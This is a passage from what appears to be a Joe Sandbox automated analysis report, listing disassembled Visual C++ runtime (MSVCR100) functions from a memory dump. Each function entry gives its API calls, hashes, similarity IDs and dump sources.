                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$Process$CurrentTerminate_access_s_dupenv_s_invalid_parameter_noinfo_invoke_watson_lock_spawnve_spawnvpefree
                                                                                                          • String ID: COMSPEC$cmd.exe
                                                                                                          • API String ID: 522409749-2256226045
                                                                                                          • Opcode ID: 4b8c6b2a0cf45a3a1c93882e0c8de366fdacc984cf1c072963984b2ddb277659
                                                                                                          • Instruction ID: 49a76a01e2b56bf79684a149ce55758ea2711ffd4ca3885e46d59ca8045df745
                                                                                                          • Opcode Fuzzy Hash: 4b8c6b2a0cf45a3a1c93882e0c8de366fdacc984cf1c072963984b2ddb277659
                                                                                                          • Instruction Fuzzy Hash: 7A21CBB1D00314EF8BA59FA98D41CAF77B8EF81669B210159F810E7280DB307D44DBB1
                                                                                                          Function 6FDF882C Relevance: 22.7, APIs: 15, Instructions: 196COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF884B
                                                                                                          • _errno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8852
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF885D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __doserrno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8881
                                                                                                          • _errno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8888
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8893
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 2983984991-0
                                                                                                          • Opcode ID: 0660d59c05fe4acc257f172e12e7f25b12de10144d6b08667fd581de79945923
                                                                                                          • Instruction ID: 62e76b5cd138e7b0bfad50589d4edb8ebf6ee7737952f9dc56305989310b7bbc
                                                                                                          • Opcode Fuzzy Hash: 0660d59c05fe4acc257f172e12e7f25b12de10144d6b08667fd581de79945923
                                                                                                          • Instruction Fuzzy Hash: CD71D231916359DBCB41DF78C940A9C7BB0BF46328F098259E4619F2D2EB70F902CB61
                                                                                                          Function 6FDDE929 Relevance: 21.3, APIs: 14, Instructions: 251stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$strncat_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2901470385-0
                                                                                                          • Opcode ID: 2269a83ebe244e794bcdccbfdb45484ffde5428aadb452dbaf33ca0d3dbbf0a2
                                                                                                          • Instruction ID: 585620331b648e9ac4925c05eb31f6b0b3f5e60186970e6e6fa84135d72cdcd9
                                                                                                          • Opcode Fuzzy Hash: 2269a83ebe244e794bcdccbfdb45484ffde5428aadb452dbaf33ca0d3dbbf0a2
                                                                                                          • Instruction Fuzzy Hash: AC81E131905357DBDFA68F68C84479DFBB0AF02328F11565AF8A1AB1C1D731B981CBA1
                                                                                                          Function 6FD86AA1 Relevance: 21.2, APIs: 14, Instructions: 234stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memcmp.MSVCR100(?,000000FE), ref: 6FD86A74
                                                                                                          • _getptd.MSVCR100(00000001,00000000), ref: 6FD86AC9
                                                                                                            • Part of subcall function 6FD850C1: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6FD850F7
                                                                                                            • Part of subcall function 6FD850C1: strcpy_s.MSVCR100(00000000,00000000,6FD851A0,00000000,00000000,00000005), ref: 6FD85165
                                                                                                          • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6FD86B10
                                                                                                          • strlen.MSVCR100(?,?,?,?,?,00000001,00000000), ref: 6FD86B26
                                                                                                          • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6FD86B35
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6FD86B83
                                                                                                          • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6FD86BAC
                                                                                                          • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6FD86BE6
                                                                                                          • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6FD86C12
                                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 6FD86C3B
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6FDB0C5C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptdmemcpystrcpy_s$DecrementInterlocked_invoke_watson_malloc_crtmallocmemcmpstrcmpstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2424186890-0
                                                                                                          • Opcode ID: d82c3f1e32fdc02b119a2c7eb9345829e703dc330a454eddba3c17a47e19695a
                                                                                                          • Instruction ID: ba9efc8750a78ba8f1c20e71dcc11e559a84f21755c2d76834f6e51ce6bc1e9c
                                                                                                          • Opcode Fuzzy Hash: d82c3f1e32fdc02b119a2c7eb9345829e703dc330a454eddba3c17a47e19695a
                                                                                                          • Instruction Fuzzy Hash: 7EA11771A102199FDBA5CF28C994BD9B7F5FF0A314F1041AAE55DD7250EB31BA808F50
                                                                                                          Function 6FDFEDB3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 185stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD806FC: GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                            • Part of subcall function 6FD806FC: __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD806FC: SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • strcpy_s.MSVCR100(?,00000086,00000000,?), ref: 6FDFEE02
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFEE17
                                                                                                          • _errno.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE6E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE78
                                                                                                          • _calloc_crt.MSVCR100(00000086,00000001), ref: 6FDFEDDC
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC291
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC29A
                                                                                                            • Part of subcall function 6FDFC284: __sys_errlist.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC2A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__sys_nerr$__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_invoke_watsonstrcpy_s
                                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                          • API String ID: 3923316158-798102604
                                                                                                          • Opcode ID: 3b90d7bee55cd33a2fef039764ca362bc7fb0f39b68e6a8741d9e830fb1e6e0c
                                                                                                          • Instruction ID: db884ef3720f0146a82fb4c7df7291693238ec055a85d4cfc7394540ec71c6b3
                                                                                                          • Opcode Fuzzy Hash: 3b90d7bee55cd33a2fef039764ca362bc7fb0f39b68e6a8741d9e830fb1e6e0c
                                                                                                          • Instruction Fuzzy Hash: EF41677250B361FBDB519B69AC44CEF7F6DEF02274B120166F418DB181D762B942C3A4
                                                                                                          Function 6FD80F61 Relevance: 21.2, APIs: 14, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$wctomb_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3498474645-0
                                                                                                          • Opcode ID: 08c566968398d0c99f0887861b7ddcc168465f608070598eedac2a0e61c6edc2
                                                                                                          • Instruction ID: bfc288e72d9d87b3a775abd9e72d4b7c729dae6c9c10172cd55641f0f300d151
                                                                                                          • Opcode Fuzzy Hash: 08c566968398d0c99f0887861b7ddcc168465f608070598eedac2a0e61c6edc2
                                                                                                          • Instruction Fuzzy Hash: C241C072505715FAC7855B78E849AEE37A8AF06364321471AE4BC9B1D1EB30F642CAA0
                                                                                                          Function 6FDDA7CF Relevance: 21.2, APIs: 14, Instructions: 152timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA7F0
                                                                                                          • _errno.MSVCR100 ref: 6FDDA80F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA81A
                                                                                                          • _time64.MSVCR100(?), ref: 6FDDA842
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDDA85F
                                                                                                          • _errno.MSVCR100 ref: 6FDDA86A
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 6FDDA8C1
                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 6FDDA8D9
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDDA8E8
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 6FDDA935
                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 6FDDA943
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?), ref: 6FDDA956
                                                                                                          • SetFileTime.KERNEL32(00000000,00000000,?,?), ref: 6FDDA95D
                                                                                                          • _errno.MSVCR100 ref: 6FDDA96B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$_errno$LocalSystem_localtime64_s$_get_osfhandle_invalid_parameter_noinfo_time64
                                                                                                          • String ID:
                                                                                                          • API String ID: 3294488376-0
                                                                                                          • Opcode ID: af122c2ab8f825d8506c227273d973ae532a2c3b9a444a5f7782eae8da22384d
                                                                                                          • Instruction ID: ead02f5ed9455ffe4fa768b06363bbab1bfc4e17ce65c53d83a00b72cb3e77f3
                                                                                                          • Opcode Fuzzy Hash: af122c2ab8f825d8506c227273d973ae532a2c3b9a444a5f7782eae8da22384d
                                                                                                          • Instruction Fuzzy Hash: 4D511A79D00709EADB40DFE4C940ADEB7B8EF09314F148116E825EB291EB34EA45CB65
                                                                                                          Function 6FDF67E6 Relevance: 21.2, APIs: 14, Instructions: 151COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _aligned_offset_malloc.MSVCR100(?,?,?), ref: 6FDF6801
                                                                                                            • Part of subcall function 6FDF66D4: _errno.MSVCR100 ref: 6FDF66E4
                                                                                                            • Part of subcall function 6FDF66D4: _invalid_parameter_noinfo.MSVCR100 ref: 6FDF66EF
                                                                                                          • _aligned_free.MSVCR100(?), ref: 6FDF6813
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _aligned_free_aligned_offset_malloc_errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2606453525-0
                                                                                                          • Opcode ID: 5536ca23d83df89a71c189350061969b1d3184b5acedb6b5716efb66999ea28d
                                                                                                          • Instruction ID: 1d74660be5721e669b87d789d02fa99dbd849805c9e4520fbddc4579a759d6fc
                                                                                                          • Opcode Fuzzy Hash: 5536ca23d83df89a71c189350061969b1d3184b5acedb6b5716efb66999ea28d
                                                                                                          • Instruction Fuzzy Hash: 79518F71905309EFCB40DF68D98499EBBB1EF45358F11856EE815EB680DB31FA41CBA0
                                                                                                          Function 6FDF4278 Relevance: 21.1, APIs: 14, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF42D1
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF42E2
                                                                                                          • __AdjustPointer.MSVCR100(00000000,-00000008), ref: 6FDF42FE
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF4319
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF432A
                                                                                                          • memmove.MSVCR100(?,?,?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF4343
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF4366
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF4373
                                                                                                          • __AdjustPointer.MSVCR100(?,-00000008,?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF438B
                                                                                                          • memmove.MSVCR100(?,00000000,?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF4394
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF439E
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF43AB
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF43B9
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF43D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ValidateWrite@@$AdjustPointermemmove$?_inconsistency@@
                                                                                                          • String ID:
                                                                                                          • API String ID: 4636599-0
                                                                                                          • Opcode ID: 0e37f9a9c62813050aca7e8a0304dafeeb5a282536829ffadc2ee41d8d4ccdca
                                                                                                          • Instruction ID: 9636dda8e2a69328b6c673b2cd197b3b822f6cc8251a8a0a5fa59247bfe3c449
                                                                                                          • Opcode Fuzzy Hash: 0e37f9a9c62813050aca7e8a0304dafeeb5a282536829ffadc2ee41d8d4ccdca
                                                                                                          • Instruction Fuzzy Hash: 8D410935546746EFEB84AF28DA40D5A33F5FF03238726411AE8148A5D0EF32F8A2C674
                                                                                                          Function 6FDFAABC Relevance: 21.1, APIs: 14, Instructions: 108stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_access_s_ismbstrail_ismbstrail_lstrnlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1943728259-0
                                                                                                          • Opcode ID: da7a3f8c3400cd8109de97202e2a9d7bf3565b5becb9942a78d846475aa9da9e
                                                                                                          • Instruction ID: c87e8786ded552d98c136ff1dfe04ecba4faa0d2b421f8da654eff766847283e
                                                                                                          • Opcode Fuzzy Hash: da7a3f8c3400cd8109de97202e2a9d7bf3565b5becb9942a78d846475aa9da9e
                                                                                                          • Instruction Fuzzy Hash: D831F83154A305DEE7E15F68C884F897BB6DF42764F52801BE8944F2C0DB75B48287B2
                                                                                                          Function 6FDF3FDC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 73stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(00000004,6FDF4967,?,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF3FE8
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF3FF6
                                                                                                            • Part of subcall function 6FDF3874: DecodePointer.KERNEL32(6FDF38B0,00000008,6FDF43D7,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF3886
                                                                                                            • Part of subcall function 6FDF3874: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6FDF38A6
                                                                                                          • ?unexpected@@YAXXZ.MSVCR100 ref: 6FDF3FFF
                                                                                                          • ?terminate@@YAXXZ.MSVCR100 ref: 6FDF400A
                                                                                                          • _getptd.MSVCR100 ref: 6FDF400F
                                                                                                          • _CxxThrowException.MSVCR100(00000000,00000000), ref: 6FDF4021
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4035
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF4040
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6FDF406B
                                                                                                          • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6FDF4089
                                                                                                          • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6FDF408F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ?_inconsistency@@$?terminate@@_getptd$?raw_name@type_info@@?unexpected@@DecodeExceptionPointerThrowstrcmp
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2020455154-1018135373
                                                                                                          • Opcode ID: 6331394edf62c529d1617fd769f0140710257b4f8d3d659c6f331c1a3ed7a437
                                                                                                          • Instruction ID: 917e3c50ab3cbe34764557fd8770eaddb9935881596cf30f3c4d08286e1764e3
                                                                                                          • Opcode Fuzzy Hash: 6331394edf62c529d1617fd769f0140710257b4f8d3d659c6f331c1a3ed7a437
                                                                                                          • Instruction Fuzzy Hash: 32210136902300CBCBA0DF78D601F4973A8AF42328F174619D9A58F290CB31F943D6A2
                                                                                                          Function 6FD96924 Relevance: 19.8, APIs: 13, Instructions: 273COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_gmtime64_s$_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezonememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3362392949-0
                                                                                                          • Opcode ID: 6490e0a55d3d3f254444212492ff7b0cac055b1ec5b8daf744decb3ffd3c3ea4
                                                                                                          • Instruction ID: e35298c9a567908e8a1714777596318c0cacf03ad3a4b6d94d12ef7232af32bc
                                                                                                          • Opcode Fuzzy Hash: 6490e0a55d3d3f254444212492ff7b0cac055b1ec5b8daf744decb3ffd3c3ea4
                                                                                                          • Instruction Fuzzy Hash: 2E8119B6A01701DBE7949FB8CC80B9E73F99F42764F11822AE411DB6C0E776F90087A5
                                                                                                          Function 6FDDEFA2 Relevance: 19.7, APIs: 13, Instructions: 231stringCOMMON
